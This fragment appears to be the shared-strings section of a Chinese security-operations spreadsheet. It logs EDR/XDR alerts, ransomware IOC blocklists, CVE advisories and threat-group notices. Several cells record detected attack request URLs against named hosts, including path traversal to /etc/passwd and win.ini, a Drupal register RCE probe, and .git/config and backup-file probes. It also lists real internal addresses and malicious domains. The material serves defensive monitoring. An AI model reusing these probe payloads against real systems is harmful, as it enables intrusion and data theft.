    <t>主机存在感染挖矿家族coinminer，同时发现横向移动行为、异常通信行为</t>
  </si>
  <si>
    <t>688e7c7d771dbe0cde0ebfe8</t>
  </si>
  <si>
    <t>E25080302098</t>
  </si>
  <si>
    <t>49199</t>
  </si>
  <si>
    <t>688e7b98e537e26e1db16fba</t>
  </si>
  <si>
    <t>tcesbfrp.zhiyoubao.com:17408/wp-content/plugins/usc-e-shop/functions/content-log.php?logfile=/Windows/win.ini</t>
  </si>
  <si>
    <t>E25080302046</t>
  </si>
  <si>
    <t>30228</t>
  </si>
  <si>
    <t>688e7bd287e5e832104b63f0</t>
  </si>
  <si>
    <t>tcesbfrp.zhiyoubao.com:17408/OA_HTML/BneViewerXMLService?bne:uueupload=TRUE</t>
  </si>
  <si>
    <t>17795</t>
  </si>
  <si>
    <t>688e7aab87e5e832104b63de</t>
  </si>
  <si>
    <t>tcesbfrp.zhiyoubao.com:17408/service/extdirect</t>
  </si>
  <si>
    <t>50023</t>
  </si>
  <si>
    <t>688e79b7cc474ca8dfd325b2</t>
  </si>
  <si>
    <t>tcesbfrp.zhiyoubao.com:17408/rest/api/latest/groupuserpicker?query=1&amp;maxResults=50000&amp;showAvatar=true</t>
  </si>
  <si>
    <t>50032</t>
  </si>
  <si>
    <t>688e78cee42dc1cdc6d4461d</t>
  </si>
  <si>
    <t>tcesbfrp.zhiyoubao.com:17408/demo/file/../../../../../../../../etc/passwd</t>
  </si>
  <si>
    <t>49874</t>
  </si>
  <si>
    <t>688e7911a447e21777964784</t>
  </si>
  <si>
    <t>tcesbfrp.zhiyoubao.com:17408/user/register?element_parents=account/mail/#value&amp;ajax_form=1&amp;_wrapper_format=drupal_ajax</t>
  </si>
  <si>
    <t>40925</t>
  </si>
  <si>
    <t>688e77db87e5e832104b63a8</t>
  </si>
  <si>
    <t>tcesbfrp.zhiyoubao.com:17408/../../../../../../../../../../../../../etc/passwd</t>
  </si>
  <si>
    <t>35575</t>
  </si>
  <si>
    <t>688e76f5e42dc1cdc6d445f3</t>
  </si>
  <si>
    <t>tcesbfrp.zhiyoubao.com:17408/app/.git/config</t>
  </si>
  <si>
    <t>55974</t>
  </si>
  <si>
    <t>192.168.3.60</t>
  </si>
  <si>
    <t>688da938e537e26e1db153e6</t>
  </si>
  <si>
    <t>45.196.247.119:443</t>
  </si>
  <si>
    <t>E25080207595</t>
  </si>
  <si>
    <t>45.196.247.119</t>
  </si>
  <si>
    <t>62647</t>
  </si>
  <si>
    <t>688c696687e5e832104b1656</t>
  </si>
  <si>
    <t>E25080113387</t>
  </si>
  <si>
    <t>62775</t>
  </si>
  <si>
    <t>688c6125d5f9f0f29b72f463</t>
  </si>
  <si>
    <t>E25080112961</t>
  </si>
  <si>
    <t>62518</t>
  </si>
  <si>
    <t>事件创建时间</t>
  </si>
  <si>
    <t>事件名称</t>
  </si>
  <si>
    <t>业务URL</t>
  </si>
  <si>
    <t>状态</t>
  </si>
  <si>
    <t>设备类型</t>
  </si>
  <si>
    <t>类型（二级场景）</t>
  </si>
  <si>
    <t>优先级</t>
  </si>
  <si>
    <t>处置建议</t>
  </si>
  <si>
    <t>未处置原因</t>
  </si>
  <si>
    <t>当前处理人</t>
  </si>
  <si>
    <t>事件标签</t>
  </si>
  <si>
    <t>事件描述</t>
  </si>
  <si>
    <t>最近更新时间</t>
  </si>
  <si>
    <t>组件检出时间</t>
  </si>
  <si>
    <t>专家研判时间</t>
  </si>
  <si>
    <t>事件遏制时间</t>
  </si>
  <si>
    <t>事件闭环时间</t>
  </si>
  <si>
    <t>影响范围</t>
  </si>
  <si>
    <t>根因分析</t>
  </si>
  <si>
    <t>危害</t>
  </si>
  <si>
    <t>外部反馈</t>
  </si>
  <si>
    <t>重新生成事件ID</t>
  </si>
  <si>
    <t>所属资产组</t>
  </si>
  <si>
    <t>受影响资产</t>
  </si>
  <si>
    <t>备注</t>
  </si>
  <si>
    <t>接受风险时间</t>
  </si>
  <si>
    <t>通告时间</t>
  </si>
  <si>
    <t>防护时间</t>
  </si>
  <si>
    <t>应急标签</t>
  </si>
  <si>
    <t>闭环时长</t>
  </si>
  <si>
    <t>通告状态</t>
  </si>
  <si>
    <t>实际通告时间</t>
  </si>
  <si>
    <t>资产内网外网</t>
  </si>
  <si>
    <t>识别时长</t>
  </si>
  <si>
    <t>响应时长</t>
  </si>
  <si>
    <t>遏制时长</t>
  </si>
  <si>
    <t>处置时长</t>
  </si>
  <si>
    <t>业务连续性风险</t>
  </si>
  <si>
    <t>SAAS-EDR</t>
  </si>
  <si>
    <t>已闭环</t>
  </si>
  <si>
    <t>EDR</t>
  </si>
  <si>
    <t>设备离线，请及时处理</t>
  </si>
  <si>
    <t>设备已检测到上线，自动关闭</t>
  </si>
  <si>
    <t>WH-bei</t>
  </si>
  <si>
    <t>AF</t>
  </si>
  <si>
    <t>QD-zhu</t>
  </si>
  <si>
    <t>TJ-zhu</t>
  </si>
  <si>
    <t>上海AF</t>
  </si>
  <si>
    <t>AF_CD</t>
  </si>
  <si>
    <t>STA_SH</t>
  </si>
  <si>
    <t>XDR-STA</t>
  </si>
  <si>
    <t>219.139.206.134、223.105.69.206、222.209.84.10、58.210.102.54、125.38.166.220、27.17.5.74、175.152.195.30、219.147.9.110、60.30.190.26、125.38.167.221、117.9.16.124、121.224.144.182、153.34.121.130、60.27.75.224、221.238.2.150、125.38.164.93、58.211.228.42、125.38.166.196、60.27.107.142、125.38.166.217、125.38.164.236、218.69.78.64、125.38.164.199、122.190.135.5、175.152.189.184、122.190.135.6、125.38.166.127、49.72.89.241、117.154.20.130、218.69.78.142、117.144.71.74、125.38.166.74、117.62.125.106、101.204.24.178、221.197.110.43</t>
  </si>
  <si>
    <t>客户反馈满意</t>
  </si>
  <si>
    <t>弱口令已推送修改</t>
  </si>
  <si>
    <t>54天19时27分</t>
  </si>
  <si>
    <t>脆弱性-&gt;账号安全</t>
  </si>
  <si>
    <t>STA_CD</t>
  </si>
  <si>
    <t>已通告</t>
  </si>
  <si>
    <t>153.34.121.130、27.17.5.74、125.38.164.74、58.210.102.54、221.238.2.150、101.204.24.178、219.147.9.110</t>
  </si>
  <si>
    <t>已推送修改</t>
  </si>
  <si>
    <t>10天1时29分</t>
  </si>
  <si>
    <t>STA_WH</t>
  </si>
  <si>
    <t>STA_TJ</t>
  </si>
  <si>
    <t xml:space="preserve">内网 </t>
  </si>
  <si>
    <t>应急工单-&gt;扫描工具</t>
  </si>
  <si>
    <t>STA_QD</t>
  </si>
  <si>
    <t>主机存在横向攻击行为，一般存在以下几种场景：遭受恶意渗透、授权渗透测试、漏扫设备漏扫、病毒横向扩散等</t>
  </si>
  <si>
    <t>已推送服务群处置/确认，后续持续观察</t>
  </si>
  <si>
    <t>0天19时10分</t>
  </si>
  <si>
    <t>应急工单-&gt;账号爆破</t>
  </si>
  <si>
    <t>账号爆破</t>
  </si>
  <si>
    <t>检测到主机存在暴力破解威胁</t>
  </si>
  <si>
    <t>192.168.4.219、192.168.4.209</t>
  </si>
  <si>
    <t>Nmap是一款网络扫描工具。命中该规则表明攻击者使用Nmap向网络发起扫描</t>
  </si>
  <si>
    <t>外部威胁-&gt;web攻击</t>
  </si>
  <si>
    <t>苏州AF-zhu</t>
  </si>
  <si>
    <t>web攻击</t>
  </si>
  <si>
    <t>感知提升：建议推送、自定义usecase、安全分析中台引擎</t>
  </si>
  <si>
    <t>攻击失败，已封堵恶意地址</t>
  </si>
  <si>
    <t>0天1时34分</t>
  </si>
  <si>
    <t>安全分析中台引擎、感知提升：建议推送、自定义usecase</t>
  </si>
  <si>
    <t>攻击失败，恶意地址已被封堵</t>
  </si>
  <si>
    <t>0天1时44分</t>
  </si>
  <si>
    <t>外部威胁-&gt;漏洞利用攻击</t>
  </si>
  <si>
    <t>漏洞利用攻击</t>
  </si>
  <si>
    <t>192.168.1.109、192.168.22.54、172.20.34.78、172.20.34.80、172.16.5.71、172.20.34.70、192.168.4.203、172.16.5.93</t>
  </si>
  <si>
    <t>oayz.haiheangroup.com:8080/CFIDE/administrator/index.cfm、60.209.248.165:19881/js.bak、60.28.99.74:8059/localsettings.php.bak、220.249.115.2:19080/jsp.old、/api/downloads?fileName=../../../../../../../../etc/passwd、101.204.24.178:8839/StreamingStatistics、oayz.haiheangroup.com:8080/、amisjd.haiheangroup.com:7788/erupt-api/ai/agent/list、/cgi-bin/order.cgi、27.17.5.74:8020/actuator/conditions、180.167.81.107、171.221.206.175:8019/+CSCOT+/oem-customization、27.17.5.74:8020/WEB-INF/web.xml~、oayz.haiheangroup.com:8080/WEB-INF/jboss-web.xml~、60.28.99.74:8059/actuator/gateway/routes/hack1762831083、219.147.9.110:8220/downloader.php、27.17.5.74:8020/WEB-INF/web.xml_、171.221.206.175:8019/admin_old、27.17.5.74:8099/static/uploadify/uploadFile.jsp、171.221.206.175:8085/aspx.bak、60.28.99.74:8099/api/blade-system/menu/list、219.147.9.110:8220/yyoa/ext/trafaxserver/SystemManage/config.jsp、60.209.248.165:19080/asp.backup、101.204.24.178:8839/site.zip、101.204.24.178:19850/+CSCOT+/oem-customization、60.28.99.74:8099/、60.28.99.74:8099/actuator/gateway/routes/hack1762825771、101.204.24.178:19850/php.old</t>
  </si>
  <si>
    <t>TSS-CD</t>
  </si>
  <si>
    <t>TSS-QD</t>
  </si>
  <si>
    <t>TSS-SH</t>
  </si>
  <si>
    <t>TSS-TJ</t>
  </si>
  <si>
    <t>TSS-WH</t>
  </si>
  <si>
    <t>未公开威胁-&gt;威胁狩猎</t>
  </si>
  <si>
    <t>勒索预防情报速递_20260306</t>
  </si>
  <si>
    <t>威胁狩猎</t>
  </si>
  <si>
    <t>紧急</t>
  </si>
  <si>
    <t>【勒索预防情报速递_20260306】 
尊敬的用户，您好，近日深信服云端安全团队，发现勒索组织面向公网发起批量扫描行为，为防止服务器被勒索加密，建议针对以下IOC在出口防火墙进行封堵处置。
156.234.252[.]194
156.234.56[.]36
43.240.239[.]226
156.234.252[.]196
43.240.239[.]230
103.44.88[.]2
103.39.16[.]229</t>
  </si>
  <si>
    <t>2026热点事件</t>
  </si>
  <si>
    <t>V26030609168</t>
  </si>
  <si>
    <t>43.240.239.230、103.39.16.229、156.234.252.196、43.240.239.226、156.234.56.36、103.44.88.2、156.234.252.194</t>
  </si>
  <si>
    <t>未公开威胁-&gt;紧急漏洞</t>
  </si>
  <si>
    <t>Nginx UI 信息泄露漏洞CVE-2026-27944</t>
  </si>
  <si>
    <t>紧急漏洞</t>
  </si>
  <si>
    <t>官方已发布最新版本修复该漏洞，建议受影响用户更新到 2.3.3 版本。
下载链接：https://github.com/0xJacky/nginx-ui/releases/</t>
  </si>
  <si>
    <t>Nginx UI 存在信息泄露漏洞，由于 /api/backup 接口缺失身份验证，导致任何未经授权的攻击者都可以直接下载系统的完整加密备份。并且该接口在响应的 X-Backup-Security 头中明文泄露了用于加密的 AES-256 密钥和初始化向量 (IV)。这使得攻击者能够立即解密下载的备份文件，从而获取其中包含的管理员凭据、SSL 私钥、数据库信息、Nginx 配置以及会话令牌等所有核心敏感数据，最终可能导致服务器被完全接管。</t>
  </si>
  <si>
    <t>V26031011340</t>
  </si>
  <si>
    <t>1. 影响组件：Nginx UI   影响范围：Nginx UI &lt; 2.3.3</t>
  </si>
  <si>
    <t>勒索预防情报速递_20260313</t>
  </si>
  <si>
    <t>【勒索预防情报速递_20260313】 
尊敬的用户，您好，近日深信服云端安全团队，发现勒索组织面向公网发起批量扫描行为，为防止服务器被勒索加密，建议针对以下IOC在出口防火墙进行封堵处置。
156.234.252[.]200
103.44.88[.]3
103.44.90[.]98
103.39.16[.]237
185.213.60[.]33
103.39.16[.]239
103.41.7[.]132</t>
  </si>
  <si>
    <t>V26031307580</t>
  </si>
  <si>
    <t>103.41.7.132、156.234.252.200、103.44.90.98、103.39.16.237、185.213.60.33、103.39.16.239、103.44.88.3</t>
  </si>
  <si>
    <t>勒索预防情报速递_20250801</t>
  </si>
  <si>
    <t>【勒索预防情报速递_20250801】 
尊敬的用户，您好，近日深信服云端安全团队，发现勒索组织面向公网发起批量扫描行为，为防止服务器被勒索加密，建议针对以下IOC进行封堵处置。
【IOC详情】
14.103.138[.]13</t>
  </si>
  <si>
    <t>2025热点事件</t>
  </si>
  <si>
    <t>V25080106696</t>
  </si>
  <si>
    <t>14.103.138.13</t>
  </si>
  <si>
    <t>已通告封堵</t>
  </si>
  <si>
    <t>2025-08-04 11:03:59</t>
  </si>
  <si>
    <t>3天1时10分</t>
  </si>
  <si>
    <t>Cobalt Strike是一款基于Java编写的全平台多方协同后渗透攻击框架，也称为CS。早期版本依赖Metasploit框架，Cobalt Strike 3.0之后则是作为单独的平台使用。其支持多种通信协议，包括http、https、dns、smb等，同时集成了提权、凭据导出、端口转发、端口扫描、横向移动、Socks代理、钓鱼攻击等功能，且支持丰富的扩展插件，几乎可以覆盖APT攻击链所需的各个技术环节。木马生成方面也涵盖了大多数的平台和攻击场景，包括 PE木马、ELF木马、网页木马、Office宏病毒木马等</t>
  </si>
  <si>
    <t>关联告警已处置，自动变更状态</t>
  </si>
  <si>
    <t>0天0时17分</t>
  </si>
  <si>
    <t>0天0时1分</t>
  </si>
  <si>
    <t>设备检测到访问目标服务器的敏感文件探测攻击(包含www关键字)，因此可能存在潜在的信息泄露漏洞、CoinMiner是一种挖矿病毒，该病毒通过永恒之蓝漏洞和WMI工具来进行传播。病毒使用永恒之蓝漏洞入侵系统之后会在系统中放置后门，接着会运行WMI脚本，这些脚本会连接到C服务器，下载挖矿机的主体程序和组件。该病毒还会利用WMI做到在无文件的条件下驻足系统，使得病毒更加隐蔽，杀软查杀难度很大</t>
  </si>
  <si>
    <t>重复告警，持续观察</t>
  </si>
  <si>
    <t>2天4时14分</t>
  </si>
  <si>
    <t>Drupal是使用PHP语言编写的开源内容管理框架，Drupal综合了强大并可自由配置的功能，能支持从个人博客到大型社区驱动的网站等各种不同应用的网站项目，应用十分广泛。由于没有对mail参数所传入的数组进行过滤，造成远程命令执行漏洞，攻击者可以利用该漏洞，执行远程命令攻击、CoinMiner是一种挖矿病毒，该病毒通过永恒之蓝漏洞和WMI工具来进行传播。病毒使用永恒之蓝漏洞入侵系统之后会在系统中放置后门，接着会运行WMI脚本，这些脚本会连接到C服务器，下载挖矿机的主体程序和组件。该病毒还会利用WMI做到在无文件的条件下驻足系统，使得病毒更加隐蔽，杀软查杀难度很大</t>
  </si>
  <si>
    <t>192.168.1.109、114.114.114.114</t>
  </si>
  <si>
    <t>blog.ezil.me、192.168.1.7</t>
  </si>
  <si>
    <t>恶意地址已封堵，使用EDR查杀后继续观察，持续观察</t>
  </si>
  <si>
    <t>此情报由深信服威胁情报中心(https://wiki.sec.sangfor.com.cn/analysis-platform)提供，主要来源于深信服安全设备的流量与日志、云沙箱病毒分析结果、天眼开源情报采集系统以及商业合作与购买的外部情报，并由安全专家通过数据分析，计算引擎过滤与鉴定等方法，获得诸如僵尸网络C2域名、恶意链接URL、攻击者IP、APT组织行为等各种战术情报与事件情报， 从而帮助用户进行威胁举证、处置与查杀的闭环操作。如果组织单位的内网主机存在主动访问这些情报的行为，则说明主机正在与黑客通信，存在失陷可能，请尽快处置</t>
  </si>
  <si>
    <t>勒索预防情报速递_20250804</t>
  </si>
  <si>
    <t>【勒索预防情报速递_20250804】 
尊敬的用户，您好，近日深信服云端安全团队，发现勒索组织面向公网发起批量扫描行为，为防止服务器被勒索加密，建议针对以下IOC进行封堵处置。
【IOC详情】
39.103.62[.]252
121.43.131[.]115</t>
  </si>
  <si>
    <t>V25080406517</t>
  </si>
  <si>
    <t>39.103.62.252、121.43.131.115</t>
  </si>
  <si>
    <t>2025-08-26 15:19:30</t>
  </si>
  <si>
    <t>0天6时2分</t>
  </si>
  <si>
    <t>1Panel 远程命令执行漏洞CVE-2025-54424</t>
  </si>
  <si>
    <t>官方已发布最新版本修复该漏洞，建议受影响用户将1Panel更新到2.0.6版本。
下载链接：https://github.com/1Panel-dev/1Panel/releases/tag/v2.0.6</t>
  </si>
  <si>
    <t>1Panel的agent客户端存在证书校验不完善导致身份验证绕过漏洞，未授权的攻击者可以利用该漏洞获取管理员权限，执行任意命令导致服务器失陷。</t>
  </si>
  <si>
    <t>V25080512479</t>
  </si>
  <si>
    <t>1. 影响组件：飞致云-1Panel   影响范围：1Panel ≤ 2.0.5</t>
  </si>
  <si>
    <t>2025-08-05 16:39:56</t>
  </si>
  <si>
    <t>1天3时22分</t>
  </si>
  <si>
    <t>Claude Code命令执行漏洞(CVE-2025-54795)</t>
  </si>
  <si>
    <t>官方已发布最新版本修复该漏洞，建议受影响用户将Claude Code更新到1.0.20及其以上版本。
参考链接：https://github.com/anthropics/claude-code/security/advisories/GHSA-x56v-x2h6-7j34</t>
  </si>
  <si>
    <t>Claude Code 存在命令注入漏洞，此漏洞源于对白名单命令的处理存在缺陷。该系统设定白名单命令可直接运行且无需用户确认，受限命令则需获得明确批准。然而，攻击者能够构造特定字符串，借助白名单命令，突破原有命令上下文，注入并执行任意 shell 命令，且整个过程无需用户确认。</t>
  </si>
  <si>
    <t>V25080607833</t>
  </si>
  <si>
    <t>1. 影响组件：Claude Code   影响范围：Claude Code&lt;v1.0.20</t>
  </si>
  <si>
    <t>2025-08-06 10:43:53</t>
  </si>
  <si>
    <t>1天17时2分</t>
  </si>
  <si>
    <t>不处置</t>
  </si>
  <si>
    <t>检测到用户试图访问Linux系统文件/etc/passwd，该文件保存服务器端Linux系统的用户密码信息。如果服务器没有对用户身份进行验证，攻击者可以通过访问该文件，获取服务端系统的用户密码，为下一步攻击做准备、Minepool是一种加密货币挖矿池，该矿池可挖掘比特币，科莫多，Litecoinz，Snowgem和Votecoin等多种货币，它可以通过组建一组协作的矿工来运作，利用其他挖矿病毒进行挖矿相关任务</t>
  </si>
  <si>
    <t>192.168.1.109、219.147.1.66</t>
  </si>
  <si>
    <t>192.168.1.7、www.f2pool.com</t>
  </si>
  <si>
    <t>#业务触发 
未处置</t>
  </si>
  <si>
    <t>2025-09-26 16:20:18</t>
  </si>
  <si>
    <t>0天0时4分</t>
  </si>
  <si>
    <t>勒索预防情报速递_20250807</t>
  </si>
  <si>
    <t>【勒索预防情报速递_20250807】 
尊敬的用户，您好，近日深信服云端安全团队，发现勒索组织面向公网发起批量扫描行为，为防止服务器被勒索加密，建议针对以下IOC进行封堵处置。
【IOC详情】
47.122.78[.]242
1.95.187[.]14</t>
  </si>
  <si>
    <t>V25080705948</t>
  </si>
  <si>
    <t>47.122.78.242、1.95.187.14</t>
  </si>
  <si>
    <t>2025-08-19 14:30:51</t>
  </si>
  <si>
    <t>1天4时20分</t>
  </si>
  <si>
    <t>2025上半年行业热点攻击事件与技术分析</t>
  </si>
  <si>
    <t>【深信服-2025上半年行业热点攻击事件与技术分析】
尊敬的安全运营用户，您好！
给您分享2025上半年行业热点攻击事件与技术分析。整理的具体内容包含以下几个方面：
一、 热点威胁事件资讯
（一） 典型特征及案例
（二） 案例详情
    1． 高水平攻击者仍重视 0day 挖掘和工具自研
    2． 高级攻击技巧持续扩散，安全软件自身难保
    3． 黑灰产中合法软件变攻击武器，恶意使用难以辨别
    4． 热门项目/工具投毒事件频发，开发者防不胜防
    5． 生成式 AI 被滥用，网络犯罪门槛降低
二、 攻击阶段与技术趋势分析
（一） 不同攻击阶段技术趋势概览
（二） 攻击技术趋势分析
    1． 关键攻击阶段特征
    2． 关键攻击技术分析
三、 网络安全威胁行业差异性分析
（一） 网络安全威胁特征行业差异性总结
（二） 网络安全威胁攻击链行业差异性总结
    1． 教育科研、政府机构
    2． 医疗、能源、制造业</t>
  </si>
  <si>
    <t>V25080713225</t>
  </si>
  <si>
    <t>2025-08-08 09:21:58</t>
  </si>
  <si>
    <t>0天18时51分</t>
  </si>
  <si>
    <t>勒索预防情报速递_20250811</t>
  </si>
  <si>
    <t>【勒索预防情报速递_20250811】 
尊敬的用户，您好，近日深信服云端安全团队，发现勒索组织面向公网发起批量扫描行为，为防止服务器被勒索加密，建议针对以下IOC进行封堵处置。
【IOC详情】
103.199.106[.]106
107.148.230[.]242</t>
  </si>
  <si>
    <t>V25081110425</t>
  </si>
  <si>
    <t>103.199.106.106、107.148.230.242</t>
  </si>
  <si>
    <t>WinRAR 目录遍历漏洞(CVE-2025-8088)</t>
  </si>
  <si>
    <t>官方已发布最新版本修复该漏洞，建议受影响用户将WinRAR更新到最新版本。
参考链接：https://www.win-rar.com/singlenewsview.html?&amp;amp;L=0&amp;amp;tx_ttnews%5Btt_news%5D=283&amp;amp;cHash=a64b4a8f662d3639dec8d65f47bc93c5</t>
  </si>
  <si>
    <t>WinRAR 存在目录遍历漏洞，在解压文件时，存在漏洞的 WinRAR 版本（包括 Windows 版 RAR、UnRAR、便携式 UnRAR 源代码及 UnRAR.dll）会错误采用特制压缩包内嵌的文件路径，而非用户指定的目标路径。攻击者可借此漏洞，制作恶意存档文件，操控文件解压路径，绕过用户指定目录，将恶意文件写入系统关键位置。一旦恶意文件被放置在这些关键位置，用户下次登录系统时，恶意软件便会自动运行，进而实现远程代码执行。注：该漏洞已发现在野利用</t>
  </si>
  <si>
    <t>V25081119700</t>
  </si>
  <si>
    <t>1. 影响组件：WinRAR   影响范围：WinRAR&lt;7.13</t>
  </si>
  <si>
    <t>2025-08-11 17:18:09</t>
  </si>
  <si>
    <t>1天4时10分</t>
  </si>
  <si>
    <t>Cherry Studio 命令注入漏洞CVE-2025-54074</t>
  </si>
  <si>
    <t>官方已发布最新版本修复该漏洞，建议受影响用户将cherry studio更新到最新版本。
下载链接：https://github.com/CherryHQ/cherry-studio</t>
  </si>
  <si>
    <t>Cherry Studio 存在命令注入漏洞，其在处理 OAuth 服务器元数据及动态客户端注册流程中，未对服务器返回的授权端点 URL 进行有效安全校验。该 URL 被直接传入不安全的 open 函数调用后，攻击者可通过构造恶意 MCP 服务器，利用 URL 编码绕过技巧在 URL 中植入恶意命令，导致受害者客户端连接时触发系统命令注入。</t>
  </si>
  <si>
    <t>V25081313480</t>
  </si>
  <si>
    <t>1. 影响组件：Cherry studio   影响范围：1.2.5 ≤ Cherry Studio ≤ 1.5.1</t>
  </si>
  <si>
    <t>2025-08-13 17:13:53</t>
  </si>
  <si>
    <t>2天16时21分</t>
  </si>
  <si>
    <t>勒索预防情报速递_20250814</t>
  </si>
  <si>
    <t>【勒索预防情报速递_20250814】 
尊敬的用户，您好，近日深信服云端安全团队，发现勒索组织面向公网发起批量扫描行为，为防止服务器被勒索加密，建议针对以下IOC进行封堵处置。
【IOC详情】
8.137.11[.]103
107.148.55[.]197</t>
  </si>
  <si>
    <t>V25081405761</t>
  </si>
  <si>
    <t>8.137.11.103、107.148.55.197</t>
  </si>
  <si>
    <t>FormBook是一种木马病毒，该病毒通过鱼叉式钓鱼邮件进行传播。攻击者在邮件中放进了诱饵文档，一旦用户点击该文档，FormBook病毒就会被安装。在受感染主机上，该病毒主要用于窃取用户主机信息或作为跳板下载执行其他恶意程序，危害极大</t>
  </si>
  <si>
    <t>未公开威胁-&gt;微软补丁日安全通告</t>
  </si>
  <si>
    <t>微软补丁日安全通告|8月份_2025</t>
  </si>
  <si>
    <t>微软补丁日安全通告</t>
  </si>
  <si>
    <t>【漏洞详情】
【GDI+远程代码执行漏洞CVE-2025-53766】
Windows GDI+是微软在 Windows XP 和 Windows Server 2003 引入的一个图形编程接口，用来取代和扩展传统的 GDI。
它的主要作用是为应用程序提供更丰富、更现代化的 2D 图形功能，并且简化图形编程工作。
其中存在远程代码执行漏洞，攻击者可以利用该漏洞在目标系统执行任意代码。经过评估，危害比较大，我们建议用户及时更新微软安全补丁。
【Windows NTLM 权限提升漏洞CVE-2025-53778】
Windows NTLM是一种由微软开发的身份验证协议，主要用于在 Windows 环境中验证用户身份、保护数据完整性，以及在一定程度上加密数据传输。
其中存在权限提升漏洞，攻击者可以利用该漏洞在目标系统获取更高的权限。经过评估，危害比较大，我们建议用户及时更新微软安全补丁。
官方解决方案：
微软官方已更新受影响软件的安全补丁，用户可根据不同系统版本下载安装对应的安全补丁，安全更新链接如下：
1.https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-53766
2.https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-53778</t>
  </si>
  <si>
    <t>V25081409840</t>
  </si>
  <si>
    <t>2025-08-14 12:11:50</t>
  </si>
  <si>
    <t>2天5时48分</t>
  </si>
  <si>
    <t>勒索预防情报速递_20250818</t>
  </si>
  <si>
    <t>【勒索预防情报速递_20250818】 
尊敬的用户，您好，近日深信服云端安全团队，发现勒索组织面向公网发起批量扫描行为，为防止服务器被勒索加密，建议针对以下IOC进行封堵处置。
【IOC详情】
47.120.4[.]208
124.221.84[.]12
47.240.92[.]80
107.149.167[.]106
107.149.167[.]107</t>
  </si>
  <si>
    <t>V25081806592</t>
  </si>
  <si>
    <t>47.120.4.208、47.240.92.80、124.221.84.12、107.149.167.107、107.149.167.106</t>
  </si>
  <si>
    <t>未公开威胁-&gt;半月刊安全通告</t>
  </si>
  <si>
    <t>8月份（上半月刊）安全通告_2025</t>
  </si>
  <si>
    <t>半月刊安全通告</t>
  </si>
  <si>
    <t xml:space="preserve">通告涵盖8月份（上半月刊）新增安全漏洞和安全事件的分析等。整理的具体内容包含以下几个方面：
一、网络安全政策法律动态
（一）国内政策热点
1、7项网络安全国家标准获批发布
2、《关键信息基础设施商用密码使用管理规定》8月1日起施行
3、七部门联合印发《关于推动脑机接口产业创新发展的实施意见》
（二）国际政策热点        
1、英国网络实名法规生效，VPN下载量暴增        
2、纽约州启动美国首个水务行业的“强制性网络安全最低标准”        
3、印度正式发布《网络空间作战条令》解密版本        
二、安全热点时事资讯        
（一）国内安全事件        
1、美情报机构频繁对我国防军工领域实施网络攻击窃密        
2、工信部发布安全提醒：防范BERT勒索软件风险        
3、南昌某医疗机构因所属 IP 被黑客远程控制被立案调查        
4、某运营商因DNS故障导致大规模的网络服务中断        
（二）国际安全事件        
1、谷歌、香奈儿、安联人寿等遭到UNC6040黑客组织语音钓鱼攻击，CRM 系统成勒索攻击跳板        
2、美国司法核心文档系统遭黑客攻击，大量敏感“热数据”疑遭泄漏        
3、法国又一电信运营商遭严重网络攻击，640万用户数据或泄露        
4、GPT-5发布24小时即被越狱：AI安全防线再遭质疑        
5、Kimsuky组织攻击套件大曝光        
（一）1Panel 远程命令执行漏洞(CVE-2025-54424)        
（二）Claude Code命令执行漏洞(CVE-2025-54795)        
（三）Cherry Studio 命令注入漏洞(CVE-2025-54074)        
（四）WinRAR 目录遍历漏洞(CVE-2025-8088)        
四、微软安全通告        
（一）漏洞概要        
（二）漏洞数据分析        
1、漏洞数量趋势        
2、历史微软补丁日8月漏洞对比        
3、漏洞数量分析        
（三）重要漏洞分析        
1、漏洞分析        
2、影响范围        
3、修复建议        </t>
  </si>
  <si>
    <t>V25081813107</t>
  </si>
  <si>
    <t>2025-08-18 14:45:54</t>
  </si>
  <si>
    <t>1天5时16分</t>
  </si>
  <si>
    <t>amdc6766团伙最新双平台特马攻击事件分析</t>
  </si>
  <si>
    <t>【深信服-威胁情报通告】 
尊敬的用户，您好，近日深信服安全团队发现以下最新黑灰产组织威胁。
       amdc6766 团伙自 2023 年上半年至今，频繁利用多种攻击手段，包括仿冒页面（AMH、宝塔、Xshell、Navicat）、供应链投毒（LNMP、OneinStack）和公开 Web漏洞等，有针对性的对运维人员进行攻击。运维人员从仿冒页面或官方平台下载并执行含有恶意代码的部署工具，与攻击者 C2 服务器建立 DNS 隧道连接。
       2025 年 8 月，深信服深瞻情报实验室再次监测到 amdc6766 黑产组织攻击活动。在本次攻击活动中，观察到多个运维管理工具相关样本，疑似利用仿冒网站分发恶意文件。近期已有用户遭受攻击，主机被植入 Rootkit 与攻击者 C2 服务器建立 DNS 隧道连接。
【IOC详情】
27.124.2[.]200
27.124.2[.]181
27.124.2[.]202
27.124.2[.]177
27.124.2[.]193
43.138.184[.]170
sogoucache[.]com
api.sohucache[.]com
qce8y[.]com
aliyunsst[.]com
360now[.]store
sogoucache[.]com
http://aliyunsst[.]com:8760
aliyun06.360stcp[.]com
dns.baidusec[.]com
ffc2987fddf1fd14f8f31c5497aedb3a
cfc594017603cc8cd9e4bf645f26bc5d
1a9d97ea7a883ac02e336b653a3012ea
422983c7d718a45b443c7c84bb4ec04a
0527ad5061ac6b46846a72245a4d0474
4990da22d0b2e91989f649049431acfa
4839fc8b6a410d55acde4b47785153f4  
建议在出口防火墙封锁该IP以及域名。</t>
  </si>
  <si>
    <t>V25081911928</t>
  </si>
  <si>
    <t>ffc2987fddf1fd14f8f31c5497aedb3a、27.124.2.193、cfc594017603cc8cd9e4bf645f26bc5d、27.124.2.200、27.124.2.202、4990da22d0b2e91989f649049431acfa、27.124.2.177、0527ad5061ac6b46846a72245a4d0474、1a9d97ea7a883ac02e336b653a3012ea、43.138.184.170、422983c7d718a45b443c7c84bb4ec04a、4839fc8b6a410d55acde4b47785153f4、27.124.2.181</t>
  </si>
  <si>
    <t>2025-09-22 11:11:46</t>
  </si>
  <si>
    <t>2天20时19分</t>
  </si>
  <si>
    <t>勒索预防情报速递_20250820</t>
  </si>
  <si>
    <t>【勒索预防情报速递_20250820】 
尊敬的用户，您好，近日深信服云端安全团队，发现勒索组织面向公网发起批量扫描行为，为防止服务器被勒索加密，建议针对以下IOC进行封堵处置。
【IOC详情】
47.96.117[.]72</t>
  </si>
  <si>
    <t>V25082010866</t>
  </si>
  <si>
    <t>47.96.117.72</t>
  </si>
  <si>
    <t>勒索预防情报速递_20250821</t>
  </si>
  <si>
    <t>【勒索预防情报速递_20250821】 
尊敬的用户，您好，近日深信服云端安全团队，发现勒索组织面向公网发起批量扫描行为，为防止服务器被勒索加密，建议针对以下IOC进行封堵处置。
